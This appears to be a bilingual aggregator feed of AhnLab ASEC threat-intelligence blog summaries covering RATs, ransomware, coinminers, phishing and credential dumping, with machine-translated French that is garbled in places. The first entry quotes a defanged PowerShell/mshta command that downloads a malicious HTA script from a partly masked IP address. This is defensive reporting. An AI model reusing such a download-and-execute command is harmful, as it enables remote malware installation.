	2024-02-07 01:59:51	Distribution des logiciels malveillants de rat déguisés en fichier lié au jeu Distribution of RAT Malware Disguised as a Gambling-related File (lien direct)	AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-relateddéposer.Comme la méthode de distribution de Venomrat introduit le mois dernier ([1]), le malware est réparti via un fichier de raccourci (.lnk), et il télécharge le rat directement depuis HTA.Le fichier de raccourci distribué contient une commande PowerShell malveillante qui exécute MSHTA et télécharge le script malveillant.Commande PowerShell C: \ Windows \ System32 \ Windowspowershell \ V1.0 \ PowerShell.exe.$ Env: C: \ W * \ S * 2 \ M * H? A. * \\ 'hxxp: //193.*.* [.] 253: 7287 / 2.hta.hta \\«Les URL malveillantes dans le fichier de raccourci confirmé sont les suivantes: hxxp: //193.*.* [.] 253: 7287 / 2.hta.hta ... AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA. The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script. PowerShell command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W\S2\mh?a. \'hxxp://193.*.[.]253:7287/2.hta.hta\' The malicious URLs in the confirmed shortcut file are as follows: hxxp://193..*[.]253:7287/2.hta.hta...	Malware		★★★
	2024-02-07 01:43:06	La fuite de données détectée par AHNLAB EDR (vs acteurs de menaces de ransomware) Data Leak Detected by AhnLab EDR (vs. Ransomware Threat Actors) (lien direct)	Les acteurs de la menace de ransomware ont extorqué de l'argent après avoir pris le contrôle des organisations & # 8217;Réseaux internes, distribution des ransomwares, chiffrer les systèmes et maintenir la restauration du système pour rançon.Récemment, cependant, les acteurs de la menace cryptent non seulement les systèmes mais divulguent également des données internes et menacent de les exposer publiquement si la rançon n'est pas payée.Habituellement, ces acteurs de menace collectent des données, les compriment et les divulguent publiquement.Dans de tels processus, les acteurs de la menace utilisent de nombreux programmes d'utilité légitimes.Ces programmes permettent déjà un transfert stable de grande taille ... Ransomware threat actors have been extorting money after taking control over organizations’ internal networks, distributing ransomware, encrypting systems, and holding system restoration for ransom. Recently, however, threat actors not only encrypts the systems but also leaks internal data and threatens to expose them publicly if the ransom is not paid. Usually, these threat actors collect data, compress them, and leak them publicly. In such processes, threat actors utilize many legitimate utility programs. These programs already allow stable transfer of large-sized...	Ransomware Threat		★★
	2024-02-02 08:27:49	Acteurs de la menace Installation des comptes de porte dérobée Linux Threat Actors Installing Linux Backdoor Accounts (lien direct)	AhnLab Security Intelligence Center (ASEC) utilise un pot de miel Linux SSH pour surveiller les attaques contre les systèmes Linux non spécifiés.Les acteurs de la menace installent des logiciels malveillants en lançant des attaques de force brute et du dictionnaire contre les systèmes Linux qui sont mal gérés, tels que l'utilisation de paramètres par défaut ou le mot de passe simple.Bien qu'il existe une variété de cas d'attaque, y compris ceux où les vers, les co -miners et les robots DDOS sont installés, ce message couvrira les cas d'attaque où des comptes de porte dérobée sont créés à la place des logiciels malveillants.De telles attaques ... AhnLab SEcurity intelligence Center (ASEC) is using a Linux SSH honeypot to monitor attacks against unspecified Linux systems. Threat actors install malware by launching brute force and dictionary attacks against Linux systems that are poorly managed, such as using default settings or having a simple password. While there is a variety of attack cases including those where worms, CoinMiners, and DDoS bots are installed, this post will cover attack cases where backdoor accounts are created instead of malware. Such attacks...	Malware Threat		★★
	2024-02-02 05:22:00	Distribution des e-mails Qshing déguisés en glissades Distribution of Qshing Emails Disguised as Payslips (lien direct)	AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of Qshing emails impersonating the Ministry of Finance ofLa République de Chine du peuple.Qshing est un nom composé des mots & # 8220; code QR & # 8221;et & # 8220; phishing & # 8221;Cela conduit à une application malveillante installée ou dirige les utilisateurs vers un site de phishing lorsqu'un code QR est analysé.L'e-mail en cours de distribution est illustré à la figure 1 et est déguisé en confirmation de réception de chèque de paie pour le premier trimestre de 2024 .... AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of Qshing emails impersonating the Ministry of Finance of the People’s Republic of China. Qshing is a compound noun from the words “QR code” and “Phishing” that leads to a malicious app being installed or directs users to a phishing site when a QR code is scanned. The email being distributed is shown in Figure 1 and is disguised as a paycheck receipt confirmation for the first quarter of 2024....			★★★
	2024-02-02 05:00:28	Analyse du cas de phishing imitant une célèbre page de connexion du portail coréen Analysis of Phishing Case Impersonating a Famous Korean Portal Login Page (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment analysé un cas de phishing où une page de phishing a été déguisée en tant quePage de connexion d'un célèbre site Web de portail coréen.L'ASEC a ensuite collecté des informations sur l'acteur de menace.La fausse page de connexion, qui aurait été distribuée sous le format des hyperliens jointe aux e-mails de phishing, s'est révélée très similaire à la page de connexion du célèbre site de portail.En fait, il est difficile de réaliser que ... AhnLab SEcurity intelligence Center (ASEC) has recently analyzed a phishing case where a phishing page was disguised as a login page of a famous Korean portal website. ASEC has then collected some information on the threat actor. The fake login page, which is believed to have been distributed in the format of hyperlinks attached to phishing emails, was found to be very similar to the login page of the famous portal site. In fact, it is difficult to realize that...	Threat		★★
	2024-02-02 04:20:46	Distribution de Zephyr Coinmin en utilisant Autoit Distribution of Zephyr CoinMiner Using Autoit (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert qu'un Coinmin, ciblant Zephyr est distribué.Le fichier est créé avec AutOIT, et il est réparti sous la forme d'un fichier compressé qui contient le Coinmin.Le fichier compressé est distribué sous le nom de «Windows_Py_M3U_EXPLOIT_2024.7Z», et en décompressant le fichier, plusieurs scripts et exécutables sont créés.Parmi eux, «comboiptvexploit.exe» se trouve un programme d'installation de système d'installation scriptable Nullsoft (NSIS), et deux fichiers JavaScript existent.Lorsque le fichier est exécuté, il ... AhnLab SEcurity intelligence Center (ASEC) recently discovered that a CoinMiner targeting Zephyr is being distributed. The file is created with Autoit, and it is being spread in the form of a compressed file that contains the CoinMiner. The compressed file is being distributed as “WINDOWS_PY_M3U_EXPLOIT_2024.7z,” and upon decompressing the file, several scripts and executables are created. Among them, “ComboIptvExploit.exe” is a Nullsoft Scriptable Install System (NSIS) installer, and two Javascript files exist within it. When the file is run, it...	Threat		★★★
	2024-02-01 02:20:55	Les informations d'identification du compte volant les logiciels malveillants détectés par Ahnlab MDS (navigateurs Web, e-mail, FTP) Account Credentials Stealing Malware Detected by AhnLab MDS (Web Browsers, Email, FTP) (lien direct)	Les utilisateurs utilisent fréquemment la commodité des fonctionnalités de connexion automatique fournies par des programmes tels que les navigateurs Web, les clients de messagerie, etClients FTP.Cependant, cette commodité a un coût car chacun de ces programmes stocke les informations d'identification du compte utilisateur dans leurs données de paramètres.En dépit d'être une fonctionnalité pratique, il présente également un risque de sécurité parce que les acteurs de menaces malveillants sont en mesure de fuir les utilisateurs & # 8217;Compte les informations d'identification facilement.Si les acteurs de malware ou de menace prennent le contrôle d'un système infecté, ils peuvent utiliser divers ... Users frequently utilize the convenience of automatic log in features provided by programs like web browsers, email clients, and FTP clients. However, this convenience comes at a cost as each of these programs stores user account credentials within their settings data. Despite being a convenient feature, it also poses a security risk because malicious threat actors are able to leak the users’ account credentials easily. If malware or threat actors gain control of an infected system, they can employ various...	Malware Threat		★★★
	2024-01-30 05:20:34	Trigona Ransomware menace l'acteur utilise Mimic Ransomware Trigona Ransomware Threat Actor Uses Mimic Ransomware (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment identifié une nouvelle activité de l'acteur de menace de ransomware Trigona Installation de Mimicransomware.Comme les cas passés, l'attaque récemment détectée cible les serveurs MS-SQL et est remarquable pour abuser de l'utilitaire BCP (Bulk Copy Program) dans les serveurs MS-SQL pendant le processus d'installation de logiciels malveillants.L'ASEC a découvert un cas d'attaque pour la première fois en utilisant BCP pour installer Mimic début janvier 2024. À la mi-janvier 2024, des types d'attaques similaires étaient identifiés où Trigona a été installé à la place ... AhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers and is notable for abusing the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process. ASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024, there were similar types of attacks identified where Trigona was installed instead...	Ransomware Malware Threat		★★
	2024-01-25 00:07:57	XMRIG COINMINER installé via des hacks de jeu XMRig CoinMiner Installed via Game Hacks (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment constaté que XMRG Coinmineur est distribué par le biais de hacks de jeux.Le processus est similaire aux cas précédemment couverts où les plates-formes de partage de fichiers ont été utilisées pour distribuer XMRIG Coinmin [1] [2].1. Channel de distribution Le canal de distribution de Coinmin & # 8217; s'est avéré être un site Web qui distribue des hacks de jeux pour des jeux célèbres.Sur ce site Web, plusieurs fichiers compressés déguisés en hacks pour les jeux célèbres sont téléchargés.Afin d'empêcher le téléchargement d'être bloqué par les navigateurs et ... AhnLab SEcurity intelligence Center (ASEC) recently found that XMRig CoinMiner is being distributed through game hacks. The process is similar to previously covered cases where file-sharing platforms were used to distribute XMRig CoinMiner [1] [2]. 1. Distribution Channel The CoinMiner’s distribution channel was found to be a website that distributes game hacks for famous games. On this website, multiple compressed files disguised as hacks for famous games are uploaded. In order to prevent the download from being blocked by browsers and...			★★
	2024-01-24 00:03:25	Distribution de Venomrat (asyncrat) imitation des sociétés informatiques coréennes Distribution of VenomRAT (AsyncRAT) Impersonating Korean IT Companies (lien direct)	Ahnlab Security Intelligence Center (ASEC) a trouvé un fichier de raccourci (.lnk) qui télécharge Asyncrat (Venomrat).Pour que le fichier LNK se déguise en fichier Word normal, il a été distribué avec le nom & # 8216; Survey.docx.lnk & # 8217;à l'intérieur d'un fichier compressé qui contenait également un fichier texte normal.Surtout, les utilisateurs doivent rester vigilants, car le fichier exécutable (blues.exe) utilisé dans l'attaque est déguisé en certificat coréen.Le processus de fonctionnement global du malware est comme indiqué ci-dessous .... AhnLab SEcurity intelligence Center (ASEC) found a shortcut file (.lnk) that downloads AsyncRAT (VenomRAT). In order for the LNK file to disguise itself as a normal Word file, it was distributed with the name ‘Survey.docx.lnk’ inside a compressed file which also contained a normal text file. Above all, users need to remain vigilant, as the executable file (blues.exe) used in the attack is disguised as a Korean company’s certificate. The overall operation process of the malware is as shown below....	Malware		★★
	2024-01-23 00:40:00	Le groupe Lazarus utilise la technique de chargement latéral DLL (2) Lazarus Group Uses the DLL Side-Loading Technique (2) (lien direct)	à travers le groupe & # 8220; Lazarus utilise la technique de chargement latéral DLL & # 8221;[1] Article de blog, Ahnlab Security Intelligence Center (ASEC) a précédemment couvert comment le groupe Lazare a utilisé la technique d'attaque de chargement de chargement DLL en utilisant des applications légitimes au stade d'accès initial pour atteindre la prochaine étape de leur processus d'attaque.Ce billet de blog couvrira les variantes de DLL ajoutées et leur routine de vérification pour les cibles.Le groupe Lazare est un groupe approprié qui cible les entreprises sud-coréennes, les institutions, les groupes de réflexion et autres.Sur ... Through the “Lazarus Group Uses the DLL Side-Loading Technique” [1] blog post, AhnLab SEcurity intelligence Center(ASEC) has previously covered how the Lazarus group used the DLL side-loading attack technique using legitimate applications in the initial access stage to achieve the next stage of their attack process. This blog post will cover the added DLL variants and their verification routine for the targets. The Lazarus group is an APT group that targets South Korean companies, institutions, think tanks, and others. On...		APT 38	★★
	2024-01-22 00:50:37	Diverses méthodes de déversement des informations d'identification LSASS détectées par EDR Various LSASS Credentials Dumping Methods Detected by EDR (lien direct)	Ahnlab Security Intelligence Center (ASEC) a publié le blog «Les informations d'identification du compte dans les environnements de domaine détectés par EDR»[1] qui discute des attaquants volant des informations d'identification de compte après avoir dominé le système dans un environnement Active Directory.Parmi la méthode de vol d'identification du compte, il couvrira en détail les différentes techniques de vidage du hachage NT (un hachage utilisé pour le protocole d'authentification NTLM) enregistré dans la mémoire de processus LSASS.L'identification du compte est enregistrée dans la mémoire du processus LSASS.L'attaquant jette le processus ... AhnLab SEcurity intelligence Center (ASEC) has posted the blog “Account Credentials Theft in Domain Environments Detected by EDR” [1] that discusses attackers stealing account credentials after dominating the system in an Active Directory environment. Among the account credential theft method, it will cover in detail the various techniques of dumping NT Hash (a hash used for NTLM authentication protocol) saved in the LSASS process memory. The account credential is saved in the LSASS process memory. The attacker dumps the process...			★★★
	2024-01-19 00:32:31	Distribution de smokeloader ciblant le gouvernement et les entreprises ukrainiens Distribution of SmokeLoader Targeting Ukrainian Government and Companies (lien direct)	Ahnlab Security Intelligence Center (ASEC) a découvert que plusieurs souches de malware smokeloder sont distribuées au gouvernement ukrainien etentreprises.Il semble que le nombre d'attaques ciblant l'Ukraine ait récemment augmenté.Les objectifs confirmés jusqu'à présent comprennent le ministère ukrainien de la Justice, les institutions publiques, les compagnies d'assurance, les institutions médicales, les entreprises de construction et les entreprises de fabrication.L'e-mail distribué suit le format illustré à la figure 1 écrite en ukrainien.Le corps comprenait des informations liées à une facture, incitant le lecteur à exécuter ... AhnLab SEcurity intelligence Center (ASEC) discovered that multiple SmokeLoader malware strains are being distributed to the Ukrainian Government and companies. It seems that the number of attacks targeting Ukraine has increased recently. The targets confirmed so far include the Ukrainian Department of Justice, public institutions, insurance companies, medical institutions, construction companies, and manufacturing companies. The distributed email follows the format shown in Figure 1 written in Ukrainian. The body included information related to an invoice, prompting the reader to execute...	Malware Medical		★★★
	2024-01-18 07:31:53	Ransomware de verrouillage distribué via des fichiers Word déguisés en curriculum vitae LockBit Ransomware Distributed Via Word Files Disguised as Resumes (lien direct)	Ahnlab Security Intelligence Center (ASEC) a identifié que les ransomwares de verrouillage sont distribués via des fichiers de mots depuis le mois dernier le mois dernier.Un point notable est que le ransomware de verrouillage est généralement distribué en se déguisant en curriculum vitae et que les fichiers de mots malveillants récemment ont également été déguisés en curriculum vitae [1].La méthode de distribution des ransomwares de verrouillage à l'aide d'URL externes dans les fichiers Word a été trouvée pour la première fois en 2022 [2].Les noms de fichiers récemment découverts des fichiers Word malveillants sont les suivants.& # 160;Nom de fichier [[[231227_YANG ]]]. Docx ... AhnLab SEcurity intelligence Center (ASEC) has identified that LockBit ransomware is being distributed via Word files since last month. A notable point is that the LockBit ransomware is usually distributed by disguising itself as resumes, and recently found malicious Word files were also disguised as resumes [1]. The distribution method of LockBit ransomware using external URLs in Word files was first found in 2022 [2]. The recently discovered file names of malicious Word files are as follows. File name [[[231227_Yang]]].docx...	Ransomware		★★
	2024-01-18 07:10:53	MIMO COINMINER ET MIMUS RANSOMWALIES installées via des attaques de vulnérabilité Mimo CoinMiner and Mimus Ransomware Installed via Vulnerability Attacks (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment observé les circonstances d'un acteur de menace de Coinmin appelé MIMO exploitant diverses vulnérabilités àinstaller des logiciels malveillants.MIMO, également surnommé HEZB, a été retrouvé pour la première fois lorsqu'ils ont installé des co -miners grâce à une exploitation de vulnérabilité Log4Shell en mars 2022. Jusqu'à présent, tous les cas d'attaque impliquaient l'installation de XMRIG Coinmin, appelé MIMO Miner Bot dans l'étape finale.Cependant, il y avait d'autres cas pertinents où le même acteur de menace a installé Mimus Ransomware, Proxyware et Reverse Shell ... AhnLab SEcurity intelligence Center (ASEC) recently observed circumstances of a CoinMiner threat actor called Mimo exploiting various vulnerabilities to install malware. Mimo, also dubbed Hezb, was first found when they installed CoinMiners through a Log4Shell vulnerability exploitation in March 2022. Up until now, all of the attack cases involved the installation of XMRig CoinMiner called Mimo Miner Bot in the final stage. However, there were other pertinent cases where the same threat actor installed Mimus ransomware, proxyware, and reverse shell...	Ransomware Malware Vulnerability Threat		★★★
	2024-01-14 22:53:23	Remcos Rat distribué via les webards Remcos RAT Being Distributed via Webhards (lien direct)	tout en surveillant les sources de distribution de logiciels malveillants en Corée du Sud, Ahnlab Security Intelligence Center (ASEC) a récemment découvert queLe malware Remcos Rat déguisé en jeux pour adultes est distribué via des webards.Les webards et les torrents sont des plateformes couramment utilisées pour la distribution des logiciels malveillants en Corée.Les attaquants utilisent normalement des logiciels malveillants facilement disponibles tels que NJRAT et UDP RAT, et les déguisent en programmes légitimes tels que des jeux ou du contenu pour adultes pour la distribution.Des cas similaires ont été introduits dans les blogs ASEC précédents ... While monitoring the distribution sources of malware in South Korea, AhnLab SEcurity intelligence Center (ASEC) recently found that the Remcos RAT malware disguised as adult games is being distributed via webhards. Webhards and torrents are platforms commonly used for the distribution of malware in Korea. Attackers normally use easily obtainable malware such as njRAT and UDP RAT, and disguise them as legitimate programs such as games or adult content for distribution. Similar cases were introduced in the previous ASEC blogs...	Malware		★★
	2024-01-09 05:14:39	Vol de comptes de compte dans les environnements de domaine détectés par EDR Account Credentials Theft in Domain Environments Detected by EDR (lien direct)	«Reconnaissance interne dans les environnements de domaine détecté par EDR» [1] Couvrait des cas où l'EDR a été utiliséDétecter le processus d'un acteur de menace qui reprend un système dans un environnement Active Directory avant de mener une reconnaissance interne pour collecter des informations.Si l'infrastructure d'une organisation est un environnement qui utilise Active Directory, l'acteur de menace peut effectuer une reconnaissance interne pour collecter des informations sur l'environnement du domaine, voler des informations d'identification, les utiliser pour un mouvement latéral et, finalement, prendre le contrôle du ... The “Internal Reconnaissance in Domain Environments Detected by EDR” [1] post covered cases where EDR was used to detect the process of a threat actor taking over a system in an Active Directory environment before conducting internal reconnaissance to collect information. If an organization\'s infrastructure is an environment that uses Active Directory, the threat actor can perform internal reconnaissance to collect information on the domain environment, steal account credentials, use these for lateral movement, and ultimately seize control over the...	Threat		★★
	2024-01-02 23:46:43	Détection de la reconnaissance interne dans les environnements de domaine en utilisant EDR Detection of Internal Reconnaissance in Domain Environments Using EDR (lien direct)	Alors que les acteurs de la menace peuvent augmenter les bénéfices en installant des co -miners ouUn logiciel malveillant de porte dérobée ou de rat pour prendre le contrôle du système infecté.Les infostelleurs sont utilisés dans le but de voler des informations sur les utilisateurs dans le système, mais parfois, ils sont utilisés pour obtenir des données qui peuvent être utilisées pour prendre le contrôle du système cible afin d'installer finalement des co -miners ou des ransomwares.Cela peut ne pas être important si l'attaque cible ... While threat actors can raise a profit by installing CoinMiners or ransomware strains after initial access, they often first install a backdoor or RAT malware to seize control over the infected system. Infostealers are used for the purpose of stealing user information in the system, but sometimes, they are used to obtain data that can be utilized in gaining control over the target system to ultimately install CoinMiners or ransomware. This may not be of significance if the attack target...	Ransomware Malware Threat		★★★
	2023-12-28 05:17:46	Analyse des tendances sur les attaques de Kimsuky Group \\ en utilisant Appleseed Trend Analysis on Kimsuky Group\\'s Attacks Using AppleSeed (lien direct)	connu pour être soutenu par la Corée du Nord, le groupe de menaces Kimsuky est actif depuis 2013. Au début,Ils ont attaqué les instituts de recherche liés à la Corée du Nord en Corée du Sud avant d'attaquer une société sud-coréenne de l'énergie en 2014. Depuis 2017, des attaques ciblant des pays autres que la Corée du Sud ont également été observées.[1] Le groupe lance généralement des attaques de phishing de lance contre la défense nationale, les industries de la défense, les médias, la diplomatie, les organisations nationales et les secteurs universitaires.Leurs attaques visent à voler des informations internes et des technologies auprès des organisations.[2] tandis que ... Known to be supported by North Korea, the Kimsuky threat group has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014. Since 2017, attacks targeting countries other than South Korea have also been observed. [1] The group usually launches spear phishing attacks against national defense, defense industries, media, diplomacy, national organizations, and academic sectors. Their attacks aim to steal internal information and technology from organizations. [2] While...	Threat Prediction		★★★
	2023-12-26 01:30:39	Analyse des attaques qui installent des scanners sur les serveurs Linux SSH Analysis of Attacks That Install Scanners on Linux SSH Servers (lien direct)	Ahnlab Security Emergency Response Center (ASEC) analyse les campagnes d'attaque contre les serveurs Linux SSH mal gérés et partage les résultatsSur le blog ASEC.Avant d'installer des logiciels malveillants tels que DDOS Bot et Coinmin, les acteurs de la menace doivent obtenir des informations sur l'objectif d'attaque, à savoir l'adresse IP et les informations d'identification du compte SSH.La numérisation IP est effectuée à cet effet pour rechercher des serveurs avec le service SSH, ou le port 22 activé, après quoi une force brute ou une attaque de dictionnaire est ... AhnLab Security Emergency response Center (ASEC) analyzes attack campaigns against poorly managed Linux SSH servers and shares the results on the ASEC Blog. Before installing malware such as DDoS bot and CoinMiner, the threat actors need to obtain information on the attack target, that is the IP address and SSH account credentials. IP scanning is performed for this purpose to look for servers with the SSH service, or port 22 activated, after which a brute force or dictionary attack is...	Malware Threat		★★★

Last update at: 2024-04-28 10:08:02
See our sources.

To see everything: Our RSS (filtrered)